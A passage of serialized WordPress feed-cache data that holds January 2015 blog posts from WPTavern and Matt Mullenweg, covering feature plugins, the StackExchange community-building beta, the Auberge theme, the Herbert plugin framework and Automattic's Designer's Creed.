girl—whose life experience was substantially different from my own; with The Human Division, I wrote a novel comprised of thirteen stand-alone “episodes.”</p>\n<p>And now? With Lock In? What new thing have I done to stretch myself as a writer and teller of tales? Well, I’ll tell you; it’s something I’m really proud of, actually:</p>\n<p>I’ve written a novel entirely free of semicolons.</p></blockquote>\n<p>John Scalzi in <a href=\"http://torforgeblog.com/2014/08/04/pacing-doesnt-just-mean-wearing-a-groove-in-the-floor/\">Pacing Doesn’t Just Mean Wearing a Groove in the Floor</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 31 Jan 2015 05:03:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WPTavern: Improvements to the Features as Plugins First Model\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38159\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"http://wptavern.com/improvements-to-the-features-as-plugins-first-model\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4185:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/FeaturePluginModelImprovementFeaturedImage.png\" rel=\"prettyphoto[38159]\"><img class=\"size-full wp-image-38232\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/FeaturePluginModelImprovementFeaturedImage.png?resize=640%2C300\" alt=\"Feature Plugin Improvements\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/terrancedc/9083765513/\">TerranceDC</a> – <a href=\"http://creativecommons.org/licenses/by-nc/2.0/\">cc</a>\n<p>Earlier this month, I described how the <a title=\"http://wptavern.com/the-features-as-plugins-first-model-is-a-mess\" href=\"http://wptavern.com/the-features-as-plugins-first-model-is-a-mess\">features as plugins first model is a mess</a>. Drew Jaynes, who is <a title=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\" href=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\">leading the development cycle for WordPress 4.2</a>, is already making headway into improving the model. Unlike previous release cycles, feature plugins that are likely to be merged into WordPress have been <a title=\"https://make.wordpress.org/core/2015/01/29/dev-chat-summary-january-28th/\" href=\"https://make.wordpress.org/core/2015/01/29/dev-chat-summary-january-28th/\">assigned a core mentor</a> at the beginning of the cycle. Assigning mentors at the beginning of the dev cycle should help make the merge process smoother and keep each project within scope.</p>\n<h2>Improved Communication</h2>\n<p>One of the biggest issues I have with feature plugins is the lack of communication regarding their progress on the <a title=\"https://make.wordpress.org/core/\" href=\"https://make.wordpress.org/core/\">Make Core</a> blog. This issue is being addressed with weekly updates that explain what’s changed, things to test, and where focus is needed. The following plugins are candidates that may be included in 4.2:</p>\n<ul>\n<li><a title=\"https://wordpress.org/plugins/press-this/\" href=\"https://wordpress.org/plugins/press-this/\">Press This</a> – Uses the <a title=\"https://make.wordpress.org/core/tag/press-this/\" href=\"https://make.wordpress.org/core/tag/press-this/\">Press This tag</a> on the Make Core blog.</li>\n<li><a title=\"https://wordpress.org/plugins/customizer-theme-switcher/\" href=\"https://wordpress.org/plugins/customizer-theme-switcher/\">Customizer Theme Switcher</a> – Uses the <a title=\"https://make.wordpress.org/core/tag/customizer-theme-switcher/\" href=\"https://make.wordpress.org/core/tag/customizer-theme-switcher/\">Customer Theme Switcher</a> tag on the Make Core blog.</li>\n</ul>\n<h2>Improved Testing Opportunities</h2>\n<p>If you browse to the Add New plugins screen in a development version of WordPress, you’ll see a Beta Testing tab. The tab provides easy access to feature plugins that are currently in development. My primary gripe with testing feature plugins is that they’re usually not synched with their Github counterparts where most of the development occurs.</p>\n<p>WordPress core developer, Dion Hulse, <a title=\"https://github.com/dd32/Github-to-WordPress-Plugins-Sync\" href=\"https://github.com/dd32/Github-to-WordPress-Plugins-Sync\">created a script</a> specifically to sync feature plugins on Github to the WordPress plugin directory. This allows feature plugins to have nightly releases which are available from the plugin directory. This small but important change makes it a lot easier to keep up with and upgrade feature plugins.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/WP42BetaTestingTab.png\" rel=\"prettyphoto[38159]\"><img class=\"size-full wp-image-38225\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/WP42BetaTestingTab.png?resize=1025%2C382\" alt=\"WordPress 4.2 Feature Plugin Beta Testing Tab\" /></a>WordPress 4.2 Feature Plugin Beta Testing Tab\n<p>It’s still early in the development cycle, but I’m impressed with Jaynes organizational abilities. He’s addressed some of the largest pain points to the feature plugin process. If the changes put the experimental model back on track, future lead developers will have an easier time managing the program.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 23:32:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"WPTavern: StackExchange Community Building Beta Provides a Valuable Resource for Digital Community Managers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38086\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"http://wptavern.com/stackexchange-community-building-beta-provides-a-valuable-resource-for-digital-community-managers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5295:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/plants.jpg\" rel=\"prettyphoto[38086]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/plants.jpg?resize=1025%2C505\" alt=\"plants\" class=\"aligncenter size-full wp-image-38240\" /></a></p>\n<p>Online community building is like gardening. Whether you’re running an active blog, moderating forums, or managing a social network, you will encounter challenges in maintaining growth. Experienced community builders have a wealth of knowledge to share with those who are new to it, especially when it comes to recognizing and mitigating toxic elements, fertilizing to encourage growth, and responding to community changes.</p>\n<p>Last year, StackExchange opened a <a href=\"http://communitybuilding.stackexchange.com/\" target=\"_blank\">Community Building beta</a> to test the waters for a new Q&A site dedicated to building, administering, managing, and cultivating digital communities. It’s been in beta for approximately six months and has attracted 877 users with an impressive 100% of questions answered.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/community-building-stackexchange.png\" rel=\"prettyphoto[38086]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/community-building-stackexchange.png?resize=765%2C549\" alt=\"community-building-stackexchange\" class=\"aligncenter size-full wp-image-38214\" /></a></p>\n<p>While the Q&A site is not oriented around WordPress (<a href=\"http://wptavern.com/wordpress-stackexchange-thrives-in-2014-with-17-million-page-views-and-14k-new-questions\" target=\"_blank\">WP Developers have their own thriving Stackexchange</a>), many of the questions and topics relate to issues that WordPress site managers deal with every day:</p>\n<ul>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/965/how-do-you-choose-the-software-that-runs-your-community\" target=\"_blank\">How do you choose the software that runs your community?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/964/cant-watch-24x7-how-do-we-keep-comments-under-control\" target=\"_blank\">Can’t watch 24×7; how do we keep comments under control?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/840/how-to-handle-a-shill\" target=\"_blank\">How to handle a shill?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/972/forum-war-because-of-a-new-rule-and-a-banned-user\" target=\"_blank\">Forum war because of a new rule and a banned user</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/1009/pitfalls-to-avoid-when-transferring-community-ownership\" target=\"_blank\">Pitfalls to avoid when transferring community ownership?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/986/do-long-term-icebreaker-threads-foster-quality-discussion\" target=\"_blank\">Do long-term “icebreaker” threads foster quality discussion?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/950/how-and-when-do-i-attract-experts-to-a-young-site-that-doesnt-yet-have-much-exp\" target=\"_blank\">How and when do I attract experts to a young site that doesn’t yet have much expert content?</a></li>\n</ul>\n<p>WordPress users have a diverse array of community building software available to them for creating interactive comments, forums, and social networking sites. These plugins make it possible for anyone to build a community, even with very little technical knowledge. However, even with the best tools at your disposal, a community is an organic thing that requires skill and dedication to cultivate.</p>\n<p>New community managers are eager to learn how to chase rabbits and moles out of their gardens while not disrupting community growth, as evidenced by the many questions submitted regarding managing user behavior. The “<a href=\"http://communitybuilding.stackexchange.com/questions/tagged/problem-users\" target=\"_blank\">problem-users</a>” tag is so far one of the most popular on the site, followed by other related topics, such as conflict resolution, new users, content curation, forums, and site growth.</p>\n<p>This new Q&A site is still <a href=\"http://area51.stackexchange.com/proposals/52070/moderators\" target=\"_blank\">navigating through its beta period</a> but still needs to demonstrate progress. So far, the beta is healthy in terms of questions getting answered, but it needs to generate more questions on a daily basis, attract more experienced members, and gain more traffic before it can graduate from its final beta.</p>\n<p>Part of the StackExchange mission is to provide answers without distraction for users who are asking practical, detailed questions. The new <a href=\"http://communitybuilding.stackexchange.com/\" target=\"_blank\">Community Building beta</a> site is not a place to vent but rather a place to get solid, actionable advice from experienced community managers. This site is an excellent resource for anyone who is involved in online community building, even if you simply have a blog that receives a steady stream of comments. If you want to contribute, sign up at <a href=\"http://stackexchange.com/\" target=\"_blank\">StackExchange</a> to get started.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 23:11:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Auberge: A Beautiful Free Restaurant Theme for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38161\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"http://wptavern.com/auberge-a-beautiful-free-restaurant-theme-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4671:\"<p>Restaurant themes don’t often land in the WordPress Themes Directory. In fact, there are barely <a href=\"https://wordpress.org/themes/search.php?q=restaurant\" target=\"_blank\">a dozen</a> listed among the 3,000+ themes on WordPress.org.</p>\n<p>One problem with many commercial restaurant themes is that they are usually marketed as a complete package with everything built into the theme, including menu management. The lack of separation of menu data from the theme means that users are locked into that theme and their content is not transferable.</p>\n<p>That’s not the case with <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">Auberge</a>, a new free theme from Oliver Juhas of <a href=\"http://www.webmandesign.eu/\" target=\"_blank\">WebMan Design</a>. Last week we featured Juhas’ <a href=\"http://wptavern.com/modern-a-beautiful-free-blog-and-portfolio-theme-for-wordpress\" target=\"_blank\">Modern</a> theme, which was built to showcase portfolios. Modern requires Jetpack for managing portfolio posts, and Auberge takes the same approach for menus.</p>\n<p>The theme’s home page features a large header image, with blog posts and/or an optional food menu preview displayed beneath.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge.jpg\" rel=\"prettyphoto[38161]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge.jpg?resize=880%2C660\" alt=\"auberge\" class=\"aligncenter size-full wp-image-38163\" /></a></p>\n<p>Check out the <a href=\"http://themedemos.webmandesign.eu/auberge/\" target=\"_blank\">live demo</a> to see how the <a href=\"http://themedemos.webmandesign.eu/auberge/menu/\" target=\"_blank\">menu page</a> is divided into sections. The menus are responsive and each item can be assigned an image, price, and description.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge-menu.jpg\" rel=\"prettyphoto[38161]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge-menu.jpg?resize=1025%2C752\" alt=\"auberge-menu\" class=\"aligncenter size-full wp-image-38183\" /></a></p>\n<p>Auberge requires the <a href=\"https://wordpress.org/plugins/webman-amplifier/\" target=\"_blank\">WebMan Amplifier</a> plugin, available on WordPress.org, in order to extend the theme to include the custom “ingredients” taxonomy and recipe metaboxes. The theme also requires <a href=\"http://jetpack.me/\" target=\"_blank\">Jetpack</a> to support many of the features you see in the demo, including:</p>\n<ul>\n<li>Food menu posts</li>\n<li>Featured content setup (banner area)</li>\n<li>Tiled galleries</li>\n<li>Image lightbox zooming effect</li>\n<li>Infinite Scroll</li>\n<li>Sharing buttons</li>\n<li>Site icon, favicon, and image logo</li>\n<li>Related posts, CDN, etc</li>\n</ul>\n<p>Auberge utilizes WordPress’ native customizer to offer layout options for the placement of the blog posts and food menu sections on the home page. You can also customize the header background and text colors, accent color, footer and widget colors. The customizer also contains options to set the basic font size and select Google Font combinations based on recommendations from the <a href=\"http://femmebot.github.io/google-type/\" target=\"_blank\">Google Web Fonts Typographic Project</a>.</p>\n<p>If you like the layouts seen in the demo site, the theme’s author has prepared all the markup for each page to copy into your pages. You can find this in the “Demo Content Page Layouts” section of the theme’s <a href=\"http://www.webmandesign.eu/manual/auberge/\" target=\"_blank\">documentation</a>.</p>\n<p>Auberge has support for post formats as well as the unique ability to split posts and pages into <a href=\"http://themedemos.webmandesign.eu/auberge/post-parts/\" target=\"_blank\">multiple parts</a>. It also supports Schema.org markup, Google Recipe View, and Theme Hook Alliance action hooks.</p>\n<p>Auberge was built based on Automattic’s <a href=\"http://underscores.me/\" target=\"_blank\">Underscores</a> starter theme. Juhas designed it to be lean, so any extra functionality comes in the form of plugins. The theme itself contains no shortcodes, sliders, or page builders.</p>\n<p>If you’re looking for a restaurant or cafe theme that includes menu content the right way, <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">Auberge</a> is a solid option. It allows you to select a different theme further down the road without losing all of your content. You can find it via your admin themes browser or <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">download</a> it directly from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 20:20:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: Designer’s Creed\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44644\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"http://ma.tt/2015/01/designers-creed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1790:\"<p>You might remember a <a href=\"http://ma.tt/2011/09/automattic-creed/\">few years back I talked about why Automattic has a creed, and shared ours</a>. Here it is again:</p>\n<blockquote><p>I will never stop learning. I won’t just work on things that are assigned to me. I know there’s no such thing as a status quo. I will build our business sustainably through passionate and loyal customers. I will never pass up an opportunity to help out a colleague, and I’ll remember the days before I knew everything. I am more motivated by impact than money, and I know that Open Source is one of the most powerful ideas of our generation. I will communicate as much as possible, because it’s the oxygen of a distributed company. I am in a marathon, not a sprint, and no matter how far away the goal is, the only way to get there is by putting one foot in front of another every day. Given time, there is no problem that’s insurmountable.</p></blockquote>\n<p>One of the parts of <a href=\"http://automattic.com/\">Automattic</a> that has grown the most over the past few years is our design corps, now over two dozen people. This group, led by creative director <a href=\"http://davemart.in/\">Dave Martin</a>, has come up with a supplemental Designer’s Creed for followers of their craft at A8C:</p>\n<blockquote><p>I take pride in my craft. I ensure that everyone — regardless of ability or device — can use my designs. I routinely ask for feedback, even when it’s uncomfortable. I regularly watch people use my designs, because testing leads to clarity. I will never stop at “good enough.”</p></blockquote>\n<p><a href=\"http://davemart.in/2015/01/24/the-automattic-designers-creed/\">You can read more about it on Dave’s blog. »</a></p>\n<p> </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 01:15:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"WPTavern: Herbert: A New WordPress Plugin Framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38040\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://wptavern.com/herbert-a-new-wordpress-plugin-framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4069:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/herbert.jpg\" rel=\"prettyphoto[38040]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/herbert.jpg?resize=831%2C405\" alt=\"herbert\" class=\"aligncenter size-full wp-image-38128\" /></a></p>\n<p>WordPress plugin authors have a great deal of liberty when it comes to structuring and organizing their code. There’s no prescribed file structure, so when you look under the hood of a plugin, you often need to poke around a bit to find out how the author is organizing things.</p>\n<p>Jason Agnew found this to be confusing when he went to build his first WordPress plugin. Agnew is the technical director at <a href=\"http://bigbitecreative.com/\" target=\"_blank\">Big Bite Creative</a>, located in Middlesbrough, England. He often collaborates with both front and back end developers on projects, which drove him to find a better way to write plugins that are organized for multiple team members.</p>\n<p>This week Agnew introduced <a href=\"http://getherbert.com/\" target=\"_blank\">Herbert</a>, a new open source framework for building WordPress plugins. “We believe the current approach to building plugins is unorganized and difficult to understand,” Agnew said. “It makes working in teams or taking over from a previous developer time consuming. Its early days for Herbert but our aim is to solve this.”</p>\n<p>Prior to creating Herbert with his team, Agnew did his homework to see if there was an existing tool to solve this problem. He discovered the <a href=\"http://wptavern.com/wordpress-plugin-boilerplate-3-0-released-with-new-community-website\" target=\"_blank\">WordPress Plugin Boilerplate</a> project, but determined that it wouldn’t work for his agency’s needs. “Although WPPB would be a great starting point, it seemed best suited to the quick development of smaller plugins,” Agnew said. “We needed something more suited to scale.”</p>\n<p>He checked out some of the most popular WordPress plugins, hoping to find a common thread among them for a semantic, structured method of plugin creation. “To our surprise, there wasn’t any sense of uniformity or consistency of implementation among them,” he said. At that point, he rallied his team to write their own WordPress plugin framework.</p>\n<p>The open source <a href=\"http://getherbert.com/\" target=\"_blank\">Herbert</a> project was born out of this effort. The framework aims to keep business logic separate from template code, so that back and frontend developers aren’t tripping over each other. “It offers a file structure to keep your code organised, with a solution as simple as all your routes belonging in the plugin/routes.php file,” Agnew said. “It no longer ties you or your development team to the WordPress Database Object ($wpdb), allowing you to use the power and effectiveness of <a href=\"http://laravel.com/docs/4.2/eloquent\" target=\"_blank\">Laravel’s Eloquent ORM</a> to handle your database queries.”</p>\n<p>Herbert utilizes Composer to handle the framework’s dependencies. Template code is stored in <a href=\"http://getherbert.com/dev/views\" target=\"_blank\">views</a>, which uses the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig</a> PHP templating engine. The framework may not be everyone’s cup of tea. However, if you like separating your code into routes, views, and controllers, then Herbert may save you some time when spinning up new plugins.</p>\n<p>The Big Bite Creative team plans to maintain the framework and will add plugin examples in the future. “We plan to introduce an interface to the WordPress post object for Eloquent, along with tests for your code,” Agnew said. They are also considering adding a WordPress-specific frontend framework to work alongside Herbert. The project is open to contribution, so feel free to fork Herbert on <a href=\"https://github.com/getherbert/herbert/\" target=\"_blank\">GitHub</a> and send code back to the team.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 23:55:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Chris Lema’s Session From PressNomics 3 on Managing Time and Energy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38135\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://wptavern.com/chris-lemas-session-from-pressnomics-3-on-managing-time-and-energy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:968:\"<p>One of my favorite sessions at <a title=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\" href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\">PressNomics 3</a> is now <a title=\"https://www.youtube.com/watch?v=KD9XtifLp9Y\" href=\"https://www.youtube.com/watch?v=KD9XtifLp9Y\">available to watch for free</a> on YouTube. Although sessions weren’t recorded or live streamed, Chris Lema used his own gear to record his presentation. He shares the lessons he’s learned throughout his career on managing time and energy.</p>\n<p>One of my favorite tips is writing down three things you want to get done each day. Each completed task builds confidence and over time, you end up with a lot of accomplishments. So far, the technique is working and as long as I complete two out of three tasks each day, I feel pretty good about myself.</p>\n<p><span class=\"embed-youtube\"></span></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 22:23:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n 